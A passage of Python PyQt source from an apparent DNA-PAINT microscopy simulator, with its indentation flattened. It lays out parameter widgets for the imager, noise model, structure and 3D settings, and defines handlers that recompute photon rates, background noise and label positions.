self.konEdit.setValue(KON_DEFAULT)
self.imagerconcentrationEdit.setValue(IMAGERCONCENTRATION_DEFAULT)
self.taubEdit.setValue(MEANBRIGHT_DEFAULT)
self.imagerconcentrationEdit.valueChanged.connect(self.changePaint)
self.konEdit.valueChanged.connect(self.changePaint)
pgrid.addWidget(kon, 1, 0)
pgrid.addWidget(self.konEdit, 1, 1)
pgrid.addWidget(QtWidgets.QLabel("M<sup>−1</sup>s<sup>−1</sup>"), 1, 2)
pgrid.addWidget(imagerconcentration, 2, 0)
pgrid.addWidget(self.imagerconcentrationEdit, 2, 1)
pgrid.addWidget(QtWidgets.QLabel("nM"), 2, 2)
pgrid.addWidget(taud, 3, 0)
pgrid.addWidget(self.taudEdit, 3, 1)
pgrid.addWidget(QtWidgets.QLabel("ms"), 3, 2)
pgrid.addWidget(taub, 4, 0)
pgrid.addWidget(self.taubEdit, 4, 1)
pgrid.addWidget(QtWidgets.QLabel("ms"), 4, 2)
pgrid.addItem(
QtWidgets.QSpacerItem(
1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
)
# IMAGER Parameters
imager_groupbox = QtWidgets.QGroupBox("Imager parameters")
igrid = QtWidgets.QGridLayout(imager_groupbox)
laserpower = QtWidgets.QLabel("Power density")
if ADVANCEDMODE:
laserpower = QtWidgets.QLabel("Laserpower")
psf = QtWidgets.QLabel("PSF")
psf_fwhm = QtWidgets.QLabel("PSF(FWHM)")
photonrate = QtWidgets.QLabel("Photonrate")
photonsframe = QtWidgets.QLabel("Photons (frame)")
photonratestd = QtWidgets.QLabel("Photonrate Std")
photonstdframe = QtWidgets.QLabel("Photons Std (frame)")
photonbudget = QtWidgets.QLabel("Photonbudget")
photonslope = QtWidgets.QLabel("Photon detection rate")
photonslopeStd = QtWidgets.QLabel("Photonrate Std ")
self.laserpowerEdit = QtWidgets.QDoubleSpinBox()
self.laserpowerEdit.setRange(0, 10)
self.laserpowerEdit.setSingleStep(0.1)
self.psfEdit = QtWidgets.QDoubleSpinBox()
self.psfEdit.setRange(0, 3)
self.psfEdit.setSingleStep(0.01)
self.psf_fwhmEdit = QtWidgets.QLabel()
self.photonrateEdit = QtWidgets.QDoubleSpinBox()
self.photonrateEdit.setRange(0, 1000)
self.photonrateEdit.setDecimals(0)
self.photonsframeEdit = QtWidgets.QLabel()
self.photonratestdEdit = QtWidgets.QDoubleSpinBox()
self.photonratestdEdit.setRange(0, 1000)
self.photonratestdEdit.setDecimals(0)
self.photonstdframeEdit = QtWidgets.QLabel()
self.photonbudgetEdit = QtWidgets.QDoubleSpinBox()
self.photonbudgetEdit.setRange(0, 100000000)
self.photonbudgetEdit.setSingleStep(100000)
self.photonbudgetEdit.setDecimals(0)
self.photonslopeEdit = QtWidgets.QSpinBox()
self.photonslopeStdEdit = QtWidgets.QDoubleSpinBox()
self.laserpowerEdit.setValue(LASERPOWER_DEFAULT)
self.psfEdit.setValue(PSF_DEFAULT)
self.photonrateEdit.setValue(PHOTONRATE_DEFAULT)
self.photonratestdEdit.setValue(PHOTONRATESTD_DEFAULT)
self.photonbudgetEdit.setValue(PHOTONBUDGET_DEFAULT)
self.photonslopeEdit.setValue(PHOTONSLOPE_DEFAULT)
self.photonslopeStdEdit.setValue(PHOTONSLOPESTD_DEFAULT)
self.psfEdit.valueChanged.connect(self.changePSF)
self.photonrateEdit.valueChanged.connect(self.changeImager)
self.photonratestdEdit.valueChanged.connect(self.changeImager)
self.laserpowerEdit.valueChanged.connect(self.changeImager)
self.photonslopeEdit.valueChanged.connect(self.changeImager)
self.photonslopeStdEdit.valueChanged.connect(self.changeImager)
self.cx = CX_DEFAULT
self.cy = CY_DEFAULT
self.photonslopemodeEdit = QtWidgets.QCheckBox()
igrid.addWidget(psf, 0, 0)
igrid.addWidget(self.psfEdit, 0, 1)
igrid.addWidget(QtWidgets.QLabel("Px"), 0, 2)
igrid.addWidget(psf_fwhm, 1, 0)
igrid.addWidget(self.psf_fwhmEdit, 1, 1)
igrid.addWidget(QtWidgets.QLabel("nm"), 1, 2)
igrid.addWidget(laserpower, 2, 0)
igrid.addWidget(self.laserpowerEdit, 2, 1)
igrid.addWidget(QtWidgets.QLabel("kW cm<sup>-2<sup>"), 2, 2)
if ADVANCEDMODE:
igrid.addWidget(QtWidgets.QLabel("mW"), 2, 2)
igridindex = 1
if ADVANCEDMODE:
igrid.addWidget(photonrate, 3, 0)
igrid.addWidget(self.photonrateEdit, 3, 1)
igrid.addWidget(QtWidgets.QLabel("Photons ms<sup>-1<sup>"), 3, 2)
igridindex = 0
igrid.addWidget(photonsframe, 4 - igridindex, 0)
igrid.addWidget(self.photonsframeEdit, 4 - igridindex, 1)
igrid.addWidget(QtWidgets.QLabel("Photons"), 4 - igridindex, 2)
igridindex = 2
if ADVANCEDMODE:
igrid.addWidget(photonratestd, 5, 0)
igrid.addWidget(self.photonratestdEdit, 5, 1)
igrid.addWidget(QtWidgets.QLabel("Photons ms<sup>-1<sup"), 5, 2)
igridindex = 0
igrid.addWidget(photonstdframe, 6 - igridindex, 0)
igrid.addWidget(self.photonstdframeEdit, 6 - igridindex, 1)
igrid.addWidget(QtWidgets.QLabel("Photons"), 6 - igridindex, 2)
igrid.addWidget(photonbudget, 7 - igridindex, 0)
igrid.addWidget(self.photonbudgetEdit, 7 - igridindex, 1)
igrid.addWidget(QtWidgets.QLabel("Photons"), 7 - igridindex, 2)
igrid.addWidget(photonslope, 8 - igridindex, 0)
igrid.addWidget(self.photonslopeEdit, 8 - igridindex, 1)
photonslopeUnit = QtWidgets.QLabel(
"Photons ms<sup>-1</sup> kW<sup>-1</sup> cm<sup>2</sup>"
)
photonslopeUnit.setWordWrap(True)
igrid.addWidget(photonslopeUnit, 8 - igridindex, 2)
igrid.addWidget(self.photonslopemodeEdit, 9 - igridindex, 1)
igrid.addWidget(
QtWidgets.QLabel("Constant detection rate"), 9 - igridindex, 0
)
if ADVANCEDMODE:
igrid.addWidget(photonslopeStd, 10 - igridindex, 0)
igrid.addWidget(self.photonslopeStdEdit, 10 - igridindex, 1)
igrid.addWidget(
QtWidgets.QLabel(
"Photons ms<sup>-1</sup> kW<sup>-1</sup> cm<sup>2</sup>"
),
10 - igridindex,
2,
)
if not ADVANCEDMODE:
backgroundframesimple = QtWidgets.QLabel("Background (Frame)")
self.backgroundframesimpleEdit = QtWidgets.QLabel()
igrid.addWidget(backgroundframesimple, 12 - igridindex, 0)
igrid.addWidget(self.backgroundframesimpleEdit, 12 - igridindex, 1)
# Make a spinbox for adjusting the background level
backgroundlevel = QtWidgets.QLabel("Background level")
self.backgroundlevelEdit = QtWidgets.QSpinBox()
self.backgroundlevelEdit.setRange(1, 100)
igrid.addWidget(backgroundlevel, 11 - igridindex, 0)
igrid.addWidget(self.backgroundlevelEdit, 11 - igridindex, 1)
self.backgroundlevelEdit.valueChanged.connect(self.changeNoise)
# NOISE MODEL
noise_groupbox = QtWidgets.QGroupBox("Noise Model")
ngrid = QtWidgets.QGridLayout(noise_groupbox)
laserc = QtWidgets.QLabel("Lasercoefficient")
imagerc = QtWidgets.QLabel("Imagercoefficient")
EquationA = QtWidgets.QLabel("Equation A")
EquationB = QtWidgets.QLabel("Equation B")
EquationC = QtWidgets.QLabel("Equation C")
Bgoffset = QtWidgets.QLabel("Background Offset")
BgStdoffset = QtWidgets.QLabel("Background Std Offset")
backgroundframe = QtWidgets.QLabel("Background (Frame)")
noiseLabel = QtWidgets.QLabel("Noise (Frame)")
self.lasercEdit = QtWidgets.QDoubleSpinBox()
self.lasercEdit.setRange(0, 100000)
self.lasercEdit.setDecimals(6)
self.imagercEdit = QtWidgets.QDoubleSpinBox()
self.imagercEdit.setRange(0, 100000)
self.imagercEdit.setDecimals(6)
self.EquationBEdit = QtWidgets.QDoubleSpinBox()
self.EquationBEdit.setRange(-100000, 100000)
self.EquationBEdit.setDecimals(6)
self.EquationAEdit = QtWidgets.QDoubleSpinBox()
self.EquationAEdit.setRange(-100000, 100000)
self.EquationAEdit.setDecimals(6)
self.EquationCEdit = QtWidgets.QDoubleSpinBox()
self.EquationCEdit.setRange(-100000, 100000)
self.EquationCEdit.setDecimals(6)
self.lasercEdit.setValue(LASERC_DEFAULT)
self.imagercEdit.setValue(IMAGERC_DEFAULT)
self.EquationAEdit.setValue(EQA_DEFAULT)
self.EquationBEdit.setValue(EQB_DEFAULT)
self.EquationCEdit.setValue(EQC_DEFAULT)
self.BgoffsetEdit = QtWidgets.QDoubleSpinBox()
self.BgoffsetEdit.setRange(-100000, 100000)
self.BgoffsetEdit.setDecimals(6)
self.BgStdoffsetEdit = QtWidgets.QDoubleSpinBox()
self.BgStdoffsetEdit.setRange(-100000, 100000)
self.BgStdoffsetEdit.setDecimals(6)
for button in [
self.lasercEdit,
self.imagercEdit,
self.EquationAEdit,
self.EquationBEdit,
self.EquationCEdit,
]:
button.valueChanged.connect(self.changeNoise)
backgroundframe = QtWidgets.QLabel("Background (Frame)")
noiseLabel = QtWidgets.QLabel("Noise (Frame)")
self.backgroundframeEdit = QtWidgets.QLabel()
self.noiseEdit = QtWidgets.QLabel()
tags = [
laserc,
imagerc,
EquationA,
EquationB,
EquationC,
Bgoffset,
BgStdoffset,
backgroundframe,
noiseLabel,
]
buttons = [
self.lasercEdit,
self.imagercEdit,
self.EquationAEdit,
self.EquationBEdit,
self.EquationCEdit,
self.BgoffsetEdit,
self.BgStdoffsetEdit,
self.backgroundframeEdit,
self.noiseEdit,
]
for i, tag in enumerate(tags):
ngrid.addWidget(tag, i, 0)
ngrid.addWidget(buttons[i], i, 1)
calibrateNoiseButton = QtWidgets.QPushButton("Calibrate Noise Model")
calibrateNoiseButton.clicked.connect(self.calibrateNoise)
importButton = QtWidgets.QPushButton("Import from Experiment (hdf5)")
importButton.clicked.connect(self.importhdf5)
ngrid.addWidget(calibrateNoiseButton, 10, 0, 1, 3)
ngrid.addWidget(importButton, 11, 0, 1, 3)
# HANDLE DEFINTIIONS
structureIncorporation = QtWidgets.QLabel("Incorporation")
self.structureIncorporationEdit = QtWidgets.QDoubleSpinBox()
self.structureIncorporationEdit.setKeyboardTracking(False)
self.structureIncorporationEdit.setRange(1, 100)
self.structureIncorporationEdit.setDecimals(0)
self.structureIncorporationEdit.setValue(INCORPORATION_DEFAULT)
handles_groupbox = QtWidgets.QGroupBox("Handles")
hgrid = QtWidgets.QGridLayout(handles_groupbox)
hgrid.addWidget(structureIncorporation, 0, 0)
hgrid.addWidget(self.structureIncorporationEdit, 0, 1)
hgrid.addWidget(QtWidgets.QLabel("%"), 0, 2)
importHandlesButton = QtWidgets.QPushButton("Import handles")
importHandlesButton.clicked.connect(self.importHandles)
hgrid.addWidget(importHandlesButton, 1, 0, 1, 3)
# 3D Settings
self.mode3DEdit = QtWidgets.QCheckBox()
threed_groupbox = QtWidgets.QGroupBox("3D")
tgrid = QtWidgets.QGridLayout(threed_groupbox)
tgrid.addWidget(self.mode3DEdit, 0, 0)
tgrid.addWidget(QtWidgets.QLabel("3D"), 0, 1)
load3dCalibrationButton = QtWidgets.QPushButton("Load 3D Calibration")
load3dCalibrationButton.clicked.connect(self.load3dCalibration)
tgrid.addWidget(load3dCalibrationButton, 0, 2)
# STRUCTURE DEFINITIONS
structure_groupbox = QtWidgets.QGroupBox("Structure")
sgrid = QtWidgets.QGridLayout(structure_groupbox)
structureno = QtWidgets.QLabel("Number of structures")
structureframe = QtWidgets.QLabel("Frame")
self.structure1 = QtWidgets.QLabel("Columns")
self.structure2 = QtWidgets.QLabel("Rows")
self.structure3 = QtWidgets.QLabel("Spacing X,Y")
self.structure3Label = QtWidgets.QLabel("nm")
structurexx = QtWidgets.QLabel("Stucture X")
structureyy = QtWidgets.QLabel("Structure Y")
structure3d = QtWidgets.QLabel("Structure 3D")
structureex = QtWidgets.QLabel("Exchange labels")
structurecomboLabel = QtWidgets.QLabel("Type")
self.structurenoEdit = QtWidgets.QSpinBox()
self.structurenoEdit.setRange(1, 1000)
self.structureframeEdit = QtWidgets.QSpinBox()
self.structureframeEdit.setRange(4, 16)
self.structurexxEdit = QtWidgets.QLineEdit(STRUCTUREXX_DEFAULT)
self.structureyyEdit = QtWidgets.QLineEdit(STRUCTUREYY_DEFAULT)
self.structureexEdit = QtWidgets.QLineEdit(STRUCTUREEX_DEFAULT)
self.structure3DEdit = QtWidgets.QLineEdit(STRUCTURE3D_DEFAULT)
self.structurecombo = QtWidgets.QComboBox()
for entry in ["Grid", "Circle", "Custom"]:
self.structurecombo.addItem(entry)
self.structure1Edit = QtWidgets.QSpinBox()
self.structure1Edit.setKeyboardTracking(False)
self.structure1Edit.setRange(1, 1000)
self.structure1Edit.setValue(STRUCTURE1_DEFAULT)
self.structure2Edit = QtWidgets.QSpinBox()
self.structure2Edit.setKeyboardTracking(False)
self.structure2Edit.setRange(1, 1000)
self.structure2Edit.setValue(STRUCTURE2_DEFAULT)
self.structure3Edit = QtWidgets.QLineEdit(STRUCTURE3_DEFAULT)
self.structure1Edit.valueChanged.connect(self.changeStructDefinition)
self.structure2Edit.valueChanged.connect(self.changeStructDefinition)
self.structure3Edit.returnPressed.connect(self.changeStructDefinition)
self.structurenoEdit.setValue(STRUCTURENO_DEFAULT)
self.structureframeEdit.setValue(STRUCTUREFRAME_DEFAULT)
self.structurenoEdit.setKeyboardTracking(False)
self.structureframeEdit.setKeyboardTracking(False)
self.structurexxEdit.returnPressed.connect(self.generatePositions)
self.structureyyEdit.returnPressed.connect(self.generatePositions)
self.structureexEdit.returnPressed.connect(self.generatePositions)
self.structure3DEdit.returnPressed.connect(self.generatePositions)
self.structurenoEdit.valueChanged.connect(self.generatePositions)
self.structureframeEdit.valueChanged.connect(self.generatePositions)
self.structurerandomOrientationEdit = QtWidgets.QCheckBox()
self.structurerandomEdit = QtWidgets.QCheckBox()
structurerandom = QtWidgets.QLabel("Random arrangement")
structurerandomOrientation = QtWidgets.QLabel("Random orientation")
self.structurerandomEdit.stateChanged.connect(self.generatePositions)
self.structurerandomOrientationEdit.stateChanged.connect(
self.generatePositions
)
self.structureIncorporationEdit.valueChanged.connect(
self.generatePositions
)
self.structurecombo.currentIndexChanged.connect(
self.changeStructureType
)
sgrid.addWidget(structureno, 1, 0)
sgrid.addWidget(self.structurenoEdit, 1, 1)
sgrid.addWidget(structureframe, 2, 0)
sgrid.addWidget(self.structureframeEdit, 2, 1)
sgrid.addWidget(QtWidgets.QLabel("Px"), 2, 2)
sgrid.addWidget(structurecomboLabel)
sgrid.addWidget(self.structurecombo, 3, 1)
sgrid.addWidget(self.structure1, 4, 0)
sgrid.addWidget(self.structure1Edit, 4, 1)
sgrid.addWidget(self.structure2, 5, 0)
sgrid.addWidget(self.structure2Edit, 5, 1)
sgrid.addWidget(self.structure3, 6, 0)
sgrid.addWidget(self.structure3Edit, 6, 1)
sgrid.addWidget(self.structure3Label, 6, 2)
sgrid.addWidget(structurexx, 7, 0)
sgrid.addWidget(self.structurexxEdit, 7, 1)
sgrid.addWidget(QtWidgets.QLabel("nm"), 7, 2)
sgrid.addWidget(structureyy, 8, 0)
sgrid.addWidget(self.structureyyEdit, 8, 1)
sgrid.addWidget(QtWidgets.QLabel("nm"), 8, 2)
sindex = 0
sgrid.addWidget(structure3d, 9, 0)
sgrid.addWidget(self.structure3DEdit, 9, 1)
sindex = 1
sgrid.addWidget(structureex, 9 + sindex, 0)
sgrid.addWidget(self.structureexEdit, 9 + sindex, 1)
sindex += -1
sgrid.addWidget(structurerandom, 11 + sindex, 1)
sgrid.addWidget(self.structurerandomEdit, 11 + sindex, 0)
sgrid.addWidget(structurerandomOrientation, 12 + sindex, 1)
sgrid.addWidget(self.structurerandomOrientationEdit, 12 + sindex, 0)
sindex += -2
importDesignButton = QtWidgets.QPushButton("Import structure from design")
importDesignButton.clicked.connect(self.importDesign)
sgrid.addWidget(importDesignButton, 15 + sindex, 0, 1, 3)
generateButton = QtWidgets.QPushButton("Generate positions")
generateButton.clicked.connect(self.generatePositions)
sgrid.addWidget(generateButton, 17 + sindex, 0, 1, 3)
cgrid.addItem(
QtWidgets.QSpacerItem(
1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
)
simulateButton = QtWidgets.QPushButton("Simulate data")
self.exchangeroundsEdit = QtWidgets.QLineEdit("1")
self.conroundsEdit = QtWidgets.QSpinBox()
self.conroundsEdit.setRange(1, 1000)
quitButton = QtWidgets.QPushButton("Quit", self)
quitButton.clicked.connect(QtCore.QCoreApplication.instance().quit)
quitButton.resize(quitButton.sizeHint())
loadButton = QtWidgets.QPushButton(
"Load settings from previous simulation"
)
btngridR = QtWidgets.QGridLayout()
self.concatExchangeEdit = QtWidgets.QCheckBox()
self.exportkinetics = QtWidgets.QCheckBox()
btngridR.addWidget(loadButton, 0, 0, 1, 2)
btngridR.addWidget(
QtWidgets.QLabel("Exchange rounds to be simulated:"), 1, 0
)
btngridR.addWidget(self.exchangeroundsEdit, 1, 1)
btngridR.addWidget(QtWidgets.QLabel("Concatenate several rounds:"), 2, 0)
btngridR.addWidget(self.conroundsEdit, 2, 1)
btngridR.addWidget(QtWidgets.QLabel("Concatenate Exchange"))
btngridR.addWidget(self.concatExchangeEdit, 3, 1)
btngridR.addWidget(QtWidgets.QLabel("Export kinetic data"))
btngridR.addWidget(self.exportkinetics, 4, 1)
btngridR.addWidget(simulateButton, 5, 0, 1, 2)
btngridR.addWidget(quitButton, 6, 0, 1, 2)
simulateButton.clicked.connect(self.simulate)
loadButton.clicked.connect(self.loadSettings)
self.show()
self.changeTime()
self.changePSF()
self.changeNoise()
self.changePaint()
pos_groupbox = QtWidgets.QGroupBox("Positions [Px]")
str_groupbox = QtWidgets.QGroupBox("Structure [nm]")
posgrid = QtWidgets.QGridLayout(pos_groupbox)
strgrid = QtWidgets.QGridLayout(str_groupbox)
self.figure1 = plt.figure()
self.figure2 = plt.figure()
self.canvas1 = FigureCanvas(self.figure1)
csize = 180
self.canvas1.setMinimumSize(csize, csize)
self.canvas2 = FigureCanvas(self.figure2)
self.canvas2.setMinimumSize(csize, csize)
posgrid.addWidget(self.canvas1)
strgrid.addWidget(self.canvas2)
self.mainpbar = QtWidgets.QProgressBar(self)
# Arrange Buttons
if ADVANCEDMODE:
self.grid.addWidget(pos_groupbox, 1, 0)
self.grid.addWidget(str_groupbox, 1, 1)
self.grid.addWidget(structure_groupbox, 2, 0, 2, 1)
self.grid.addWidget(camera_groupbox, 1, 2)
self.grid.addWidget(paint_groupbox, 3, 1)
self.grid.addWidget(imager_groupbox, 2, 1)
self.grid.addWidget(noise_groupbox, 2, 2)
self.grid.addLayout(btngridR, 3, 2)
self.grid.addWidget(self.mainpbar, 5, 0, 1, 4)
self.grid.addWidget(threed_groupbox, 4, 0)
self.grid.addWidget(handles_groupbox, 4, 1)
else:
# Left side
self.grid.addWidget(pos_groupbox, 1, 0)
self.grid.addWidget(str_groupbox, 1, 1)
self.grid.addWidget(structure_groupbox, 2, 0)
self.grid.addWidget(paint_groupbox, 3, 0)
self.grid.addWidget(handles_groupbox, 4, 0)
self.grid.addWidget(threed_groupbox, 5, 0)
# Right side
self.grid.addWidget(imager_groupbox, 2, 1)
self.grid.addWidget(camera_groupbox, 3, 1)
self.grid.addLayout(btngridR, 4, 1, 2, 1)
self.grid.addWidget(self.mainpbar, 8, 0, 1, 4)
mainWidget = QtWidgets.QWidget()
mainWidget.setLayout(self.grid)
self.setCentralWidget(mainWidget)
self.setGeometry(300, 300, 300, 150)
# CALL FUNCTIONS
self.generatePositions()
self.mainpbar.setValue(0)
self.statusBar().showMessage("Simulate ready.")
def load3dCalibration(self):
# if hasattr(self.window, 'movie_path'):
# dir = os.path.dirname(self.window.movie_path)
# else:
dir = None
path, ext = QtWidgets.QFileDialog.getOpenFileName(
self, "Load 3d calibration", directory=dir, filter="*.yaml"
)
if path:
with open(path, "r") as f:
z_calibration = yaml.load(f)
self.cx = _np.array(z_calibration["X Coefficients"])
self.cy = _np.array(z_calibration["Y Coefficients"])
self.statusBar().showMessage("Caliration loaded from: " + path)
def changeTime(self):
laserpower = self.laserpowerEdit.value()
itime = self.integrationtimeEdit.value()
frames = self.framesEdit.value()
totaltime = itime * frames / 1000 / 60
totaltime = round(totaltime * 100) / 100
self.totaltimeEdit.setText(str(totaltime))
photonslope = self.photonslopeEdit.value()
photonslopestd = photonslope / STDFACTOR
if ADVANCEDMODE:
photonslopestd = self.photonslopeStdEdit.value()
photonrate = photonslope * laserpower
photonratestd = photonslopestd * laserpower
photonsframe = round(photonrate * itime)
photonsframestd = round(photonratestd * itime)
self.photonsframeEdit.setText(str(photonsframe))
self.photonstdframeEdit.setText(str(photonsframestd))
self.changeNoise()
def changePaint(self):
kon = self.konEdit.value()
imagerconcentration = self.imagerconcentrationEdit.value()
taud = round(1 / (kon * imagerconcentration * 1 / 10 ** 9) * 1000)
self.taudEdit.setText(str(taud))
self.changeNoise()
def changePSF(self):
psf = self.psfEdit.value()
pixelsize = self.pixelsizeEdit.value()
psf_fwhm = round(psf * pixelsize * 2.355)
self.psf_fwhmEdit.setText(str(psf_fwhm))
def changeImager(self):
laserpower = self.laserpowerEdit.value()
itime = self.integrationtimeEdit.value()
photonslope = self.photonslopeEdit.value()
photonslopestd = photonslope / STDFACTOR
if ADVANCEDMODE:
photonslopestd = self.photonslopeStdEdit.value()
photonrate = photonslope * laserpower
photonratestd = photonslopestd * laserpower
photonsframe = round(photonrate * itime)
photonsframestd = round(photonratestd * itime)
self.photonsframeEdit.setText(str(photonsframe))
self.photonstdframeEdit.setText(str(photonsframestd))
self.photonrateEdit.setValue((photonrate))
self.photonratestdEdit.setValue((photonratestd))
self.changeNoise()
def changeNoise(self):
itime = self.integrationtimeEdit.value()
imagerconcentration = self.imagerconcentrationEdit.value()
laserpower = self.laserpowerEdit.value() * POWERDENSITY_CONVERSION
bglevel = self.backgroundlevelEdit.value()
if ADVANCEDMODE:
# NEW NOISE MODEL
laserc = self.lasercEdit.value()
imagerc = self.imagercEdit.value()
bgoffset = self.BgoffsetEdit.value()
bgmodel = (
laserc + imagerc * imagerconcentration
) * laserpower * itime + bgoffset
equationA = self.EquationAEdit.value()
equationB = self.EquationBEdit.value()
equationC = self.EquationCEdit.value()
bgstdoffset = self.BgStdoffsetEdit.value()
bgmodelstd = (
equationA * laserpower * itime
+ equationB * bgmodel
+ equationC
+ bgstdoffset * bglevel
)
self.backgroundframeEdit.setText(str(int(bgmodel)))
self.noiseEdit.setText(str(int(bgmodelstd)))
else:
bgmodel = (
(LASERC_DEFAULT + IMAGERC_DEFAULT * imagerconcentration)
* laserpower
* itime
* bglevel
)
self.backgroundframesimpleEdit.setText(str(int(bgmodel)))
def changeStructureType(self):
typeindex = self.structurecombo.currentIndex()
# TYPEINDEX: 0 = GRID, 1 = CIRCLE, 2 = CUSTOM, 3 = Handles
if typeindex == 0:
self.structure1.show()
self.structure2.show()
self.structure3.show()
self.structure1Edit.show()
self.structure2Edit.show()
self.structure3Edit.show()
self.structure3Label.show()
self.structure1.setText("Columns")
self.structure2.setText("Rows")
self.structure3.setText("Spacing X,Y")
self.structure1Edit.setValue(3)
self.structure2Edit.setValue(4)
self.structure3Edit.setText("20,20")
elif typeindex == 1:
self.structure1.show()
self.structure2.show()
self.structure3.show()
self.structure1Edit.show()
self.structure2Edit.show()
self.structure3Edit.show()
self.structure3Label.show()
self.structure1.hide()
self.structure2.setText("Number of Labels")
self.structure3.setText("Diameter")
self.structure1Edit.hide()
self.structure2Edit.setValue(12)
self.structure3Edit.setText("100")
elif typeindex == 2:
self.structure1.hide()
self.structure2.hide()
self.structure3.hide()
self.structure1Edit.hide()
self.structure2Edit.hide()
self.structure3Edit.hide()
self.structure3Label.hide()
elif typeindex == 3:
self.structure1.hide()
self.structure2.hide()
self.structure3.hide()
self.structure1Edit.hide()
self.structure2Edit.hide()
self.structure3Edit.hide()
self.structure3Label.hide()
self.structure3Label.hide()
self.changeStructDefinition()
def changeStructDefinition(self):
typeindex = self.structurecombo.currentIndex()
if typeindex == 0: # grid
rows = self.structure1Edit.value()
cols = self.structure2Edit.value()
spacingtxt = _np.asarray((self.structure3Edit.text()).split(","))
try:
spacingx = float(spacingtxt[0])
except ValueError:
spacingx = 1
if spacingtxt.size > 1:
try:
spacingy = float(spacingtxt[1])
except ValueError:
spacingy = 1
else:
spacingy = 1
structurexx = ""
structureyy = ""
structureex = ""
structure3d = ""
for i in range(0, rows):
for j in range(0, cols):
structurexx = structurexx + str(i * spacingx) + ","
structureyy = structureyy + str(j * spacingy) + ","
structureex = structureex + "1,"
structure3d = structure3d + "0,"
structurexx = structurexx[:-1]
structureyy = structureyy[:-1]
structureex = structureex[:-1]
self.structurexxEdit.setText(structurexx)
self.structureyyEdit.setText(structureyy)
self.structureexEdit.setText(structureex)
self.structure3DEdit.setText(structure3d)
self.generatePositions()
elif typeindex == 1: # CIRCLE
labels = self.structure2Edit.value()
diametertxt = _np.asarray((self.structure3Edit.text()).split(","))
try:
diameter = float(diametertxt[0])
except ValueError:
diameter = 100
twopi = 2 * 3.1415926535
circdata = _np.arange(0, twopi, twopi / labels)
xxval = _np.round(_np.cos(circdata) * diameter / 2 * 100) / 100
yyval = _np.round(_np.sin(circdata) * diameter / 2 * 100) / 100
structurexx = ""
structureyy = ""
structureex = ""
structure3d = ""
for i in range(0, xxval.size):
structurexx = structurexx + str(xxval[i]) + ","
structureyy = structureyy + str(yyval[i]) + ","
structureex = structureex + "1,"
structure3d = structure3d + "0,"
structurexx = structurexx[:-1]
structureyy = structureyy[:-1]
structureex = structureex[:-1]
self.structurexxEdit.setText(structurexx)
self.structureyyEdit.setText(structureyy)
self.structureexEdit.setText(structureex)
self.structure3DEdit.setText(structure3d)
self.generatePositions()
elif typeindex == 2: # Custom
self.generatePositions()
elif typeindex == 3: # Handles
print("Handles will be displayed..")
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Escape:
self.close()
def vectorToString(self, x):
x_arrstr = _np.char.mod("%f", x)
x_str = ",".join(x_arrstr)
return x_str
def simulate(self):
exchangeroundstoSim = _np.asarray(
(self.exchangeroundsEdit.text()).split(",")
)
exchangeroundstoSim = exchangeroundstoSim.astype(_np.int)
noexchangecolors = len(set(exchangeroundstoSim))
exchangecolors = list(set(exchangeroundstoSim))
if self.concatExchangeEdit.checkState():
conrounds = noexchangecolors
else:
conrounds = self.conroundsEdit.value()
self.currentround += 1
if self.currentround == 1:
fileNameOld, exe = QtWidgets.QFileDialog.getSaveFileName(
self, "Save movie to..", filter="*.raw"
)
if fileNameOld:
self.fileName = fileNameOld
else:
self.currentround -= 1
else:
fileNameOld = self.fileName
if fileNameOld:
self.statusBar().showMessage(
"Set round " + str(self.currentround) + " of " + str(conrounds)
)
# READ IN PARAMETERS
# STRUCTURE
structureNo = self.structurenoEdit.value()
structureFrame = self.structureframeEdit.value()
structureIncorporation = self.structureIncorporationEdit.value()
structureArrangement = int(self.structurerandomEdit.checkState())
structureOrientation = int(
self.structurerandomOrientationEdit.checkState()
)
structurex = self.structurexxEdit.text()
structurey = self.structureyyEdit.text()
structureextxt = self.structureexEdit.text()
structure3dtxt = self.structure3DEdit.text()
# PAINT
kon = self.konEdit.value()
imagerconcentration = self.imagerconcentrationEdit.value()
taub = self.taubEdit.value()
taud = int(self.taudEdit.text())
# IMAGER PARAMETERS
psf = self.psfEdit.value()
photonrate = self.photonrateEdit.value()
photonratestd = self.photonratestdEdit.value()
photonbudget = self.photonbudgetEdit.value()
laserpower = self.laserpowerEdit.value()
photonslope = self.photonslopeEdit.value()
photonslopeStd = photonslope / STDFACTOR
if ADVANCEDMODE:
photonslopeStd = self.photonslopeStdEdit.value()
if self.photonslopemodeEdit.checkState():
photonratestd = 0
# CAMERA PARAMETERS
imagesize = self.camerasizeEdit.value()
itime = self.integrationtimeEdit.value()
frames = self.framesEdit.value()
pixelsize = self.pixelsizeEdit.value()
# NOISE MODEL
if ADVANCEDMODE:
background = int(self.backgroundframeEdit.text())
noise = int(self.noiseEdit.text())
laserc = self.lasercEdit.value()
imagerc = self.imagercEdit.value()
bgoffset = self.BgoffsetEdit.value()
equationA = self.EquationAEdit.value()
equationB = self.EquationBEdit.value()
equationC = self.EquationCEdit.value()
bgstdoffset = self.BgStdoffsetEdit.value()
else:
background = int(self.backgroundframesimpleEdit.text())
noise = _np.sqrt(background)
laserc = LASERC_DEFAULT
imagerc = IMAGERC_DEFAULT
bgoffset = BGOFFSET_DEFAULT
equationA = EQA_DEFAULT
equationB = EQB_DEFAULT
equationC = EQC_DEFAULT
bgstdoffset = BGSTDOFFSET_DEFAULT
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
self.statusBar().showMessage("Simulation started")
struct = self.newstruct
handlex = self.vectorToString(struct[0, :])
handley = self.vectorToString(struct[1, :])
handleex = self.vectorToString(struct[2, :])
handless = self.vectorToString(struct[3, :])
handle3d = self.vectorToString(struct[4, :])
mode3Dstate = int(self.mode3DEdit.checkState())
t0 = time.time()
if self.concatExchangeEdit.checkState():
noexchangecolors = (
1
) # Overwrite the number to not trigger the for loop
for i in range(0, noexchangecolors):
if noexchangecolors > 1:
fileName = _io.multiple_filenames(fileNameOld, i)
partstruct = struct[:, struct[2, :] == exchangecolors[i]]
elif self.concatExchangeEdit.checkState():
fileName = fileNameOld
partstruct = struct[
:,
struct[2, :] == exchangecolors[self.currentround - 1],
]
else:
fileName = fileNameOld
partstruct = struct[:, struct[2, :] == exchangecolors[0]]
self.statusBar().showMessage("Distributing photons ...")
bindingsitesx = partstruct[0, :]
nosites = len(
bindingsitesx
) # number of binding sites in image
photondist = _np.zeros((nosites, frames), dtype=_np.int)
